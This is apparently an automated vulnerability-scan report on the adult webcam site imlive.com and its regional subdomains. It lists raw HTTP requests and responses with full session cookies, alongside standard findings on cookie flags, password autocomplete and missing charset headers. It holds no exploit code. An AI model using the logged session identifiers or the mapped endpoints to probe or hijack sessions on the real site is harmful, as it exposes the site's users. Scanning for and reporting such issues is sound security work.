GET /webcam-sign-up/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:17 GMT
Connection: close
Content-Length: 18918
Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]...
GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 21809
Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]...
GET /compliance.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:42 GMT
Connection: close
Content-Length: 1925
Vary: Accept-Encoding
<html> <head> <title>Compliance - Live Video Chat at ImLive</title> <meta name="description" content="Our live video chat hosts are at least 18 years old. ImLive complies with 18 U.S.C. §  ...[SNIP]...
GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 19369
Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]...
GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:20 GMT
Connection: close
Content-Length: 16528
Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]...
GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:19 GMT
Connection: close
Content-Length: 16092
Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]...
GET /sex_webcams_index/index.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 23768
Vary: Accept-Encoding
<html> <head> <title> Live Sex Chat Categories at ImLive </title> <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO ...[SNIP]...
GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
